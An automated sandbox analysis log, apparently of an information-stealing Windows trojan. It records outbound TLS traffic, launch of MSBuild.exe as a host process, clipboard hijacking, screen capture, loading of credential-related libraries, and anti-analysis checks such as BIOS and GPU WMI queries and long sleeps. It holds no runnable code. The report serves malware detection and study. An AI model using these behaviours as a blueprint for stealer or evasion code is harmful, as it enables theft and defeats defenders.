        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49711 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49712 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49714 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49717 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49718 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49720 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49722 version: TLS 1.2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0043E7C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,2_2_0043E7C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_03371000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,2_2_03371000
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0043E7C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,2_2_0043E7C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0043F1BF GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,2_2_0043F1BF
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748B072EC0_2_00007FF748B072EC
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748B011D40_2_00007FF748B011D4
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AF5E000_2_00007FF748AF5E00
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AF51F00_2_00007FF748AF51F0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AF4DE00_2_00007FF748AF4DE0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AED9200_2_00007FF748AED920
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AF01700_2_00007FF748AF0170
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AEDD600_2_00007FF748AEDD60
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AE3ED00_2_00007FF748AE3ED0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AF5AD00_2_00007FF748AF5AD0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AF4AD00_2_00007FF748AF4AD0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AEC2C00_2_00007FF748AEC2C0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748B097080_2_00007FF748B09708
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AFA29C0_2_00007FF748AFA29C
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AEF7100_2_00007FF748AEF710
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AE6EE00_2_00007FF748AE6EE0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AE26400_2_00007FF748AE2640
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748B07A6C0_2_00007FF748B07A6C
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AF1BB00_2_00007FF748AF1BB0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AF1FA00_2_00007FF748AF1FA0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AED3F00_2_00007FF748AED3F0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AEBB400_2_00007FF748AEBB40
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AE47900_2_00007FF748AE4790
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AE2B700_2_00007FF748AE2B70
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748B013580_2_00007FF748B01358
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AF08E00_2_00007FF748AF08E0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AF24500_2_00007FF748AF2450
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AEF4400_2_00007FF748AEF440
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AF78800_2_00007FF748AF7880
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748AF40600_2_00007FF748AF4060
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0042B00F2_2_0042B00F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004171702_2_00417170
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0042E9A02_2_0042E9A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00420A002_2_00420A00
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0044CAF02_2_0044CAF0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00443AB02_2_00443AB0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0042B3502_2_0042B350
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00447B502_2_00447B50
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00435B692_2_00435B69
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004123782_2_00412378
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0041C3782_2_0041C378
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0040BB102_2_0040BB10
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0043638D2_2_0043638D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0041B5702_2_0041B570
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0044BE702_2_0044BE70
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0041569F2_2_0041569F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00443EA02_2_00443EA0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00449F272_2_00449F27
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004010402_2_00401040
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004110402_2_00411040
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004430602_2_00443060
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0041A8702_2_0041A870
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0042C0C02_2_0042C0C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0042C0D12_2_0042C0D1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0044B0D02_2_0044B0D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0042F0EB2_2_0042F0EB
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004369172_2_00436917
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004251F02_2_004251F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0043225F2_2_0043225F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0043E2602_2_0043E260
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00423A702_2_00423A70
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00408A102_2_00408A10
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0040BA302_2_0040BA30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0042E2C02_2_0042E2C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004432C02_2_004432C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00444AD02_2_00444AD0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00402AB02_2_00402AB0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0040A3502_2_0040A350
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0041CB182_2_0041CB18
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0042FB192_2_0042FB19
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004343202_2_00434320
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004483202_2_00448320
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0044AB232_2_0044AB23
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0044B3302_2_0044B330
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0042BBC02_2_0042BBC0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0044C3C02_2_0044C3C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0044B3D02_2_0044B3D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004163D82_2_004163D8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0041E3DB2_2_0041E3DB
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004353D92_2_004353D9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0040FBF02_2_0040FBF0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0042A3832_2_0042A383
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004283802_2_00428380
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0044BB802_2_0044BB80
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00445B902_2_00445B90
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00442BB12_2_00442BB1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0042045C2_2_0042045C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0044B4602_2_0044B460
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0041DC1A2_2_0041DC1A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004244302_2_00424430
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004374392_2_00437439
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0040D4C02_2_0040D4C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0043E4F02_2_0043E4F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004384902_2_00438490
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004034B02_2_004034B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0040AD502_2_0040AD50
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004095702_2_00409570
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0043BD702_2_0043BD70
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00407D102_2_00407D10
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00422D102_2_00422D10
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00416D3A2_2_00416D3A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00427DC02_2_00427DC0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0040CDD02_2_0040CDD0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0043C5ED2_2_0043C5ED
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0042EDF02_2_0042EDF0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0040B5902_2_0040B590
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004135B02_2_004135B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00403E502_2_00403E50
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0043965A2_2_0043965A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004106702_2_00410670
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0041D6102_2_0041D610
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0042EE102_2_0042EE10
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00437E142_2_00437E14
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00441ED62_2_00441ED6
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00444ED02_2_00444ED0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00430E892_2_00430E89
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004267702_2_00426770
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0042DF702_2_0042DF70
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0042BF002_2_0042BF00
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0044171A2_2_0044171A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004237202_2_00423720
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00439F202_2_00439F20
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0040C7302_2_0040C730
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004047322_2_00404732
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00448FC72_2_00448FC7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004457D02_2_004457D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0041FFE02_2_0041FFE0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0043B7E02_2_0043B7E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00408FF02_2_00408FF0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0042D7FD2_2_0042D7FD
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0043DFB02_2_0043DFB0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0044C7B02_2_0044C7B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 0040B390 appears 43 times
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 0041A860 appears 95 times
        Source: SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeStatic PE information: Section: .bss ZLIB complexity 1.0003236607142858
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/0@4/2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_00443EA0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,2_2_00443EA0
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03
        Source: SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeVirustotal: Detection: 52%
        Source: SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeReversingLabs: Detection: 55%
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exe"
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeStatic PE information: Image base 0x140000000 > 0x60000000
        Source: SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeStatic PE information: section name: .gxfg
        Source: SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeStatic PE information: section name: .retplne
        Source: SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeStatic PE information: section name: _RDATA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_004548BF push ss; iretd 2_2_004548DA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0044F470 push esi; ret 2_2_0044F472
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0044F478 push ecx; retf 2_2_0044F47E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSystem information queried: FirmwareTableInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 7079Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7908Thread sleep time: -150000s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7180Thread sleep count: 7079 > 30Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeLast function: Thread delayed
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeCode function: 0_2_00007FF748B011D4 FindFirstFileExW,0_2_00007FF748B011D4
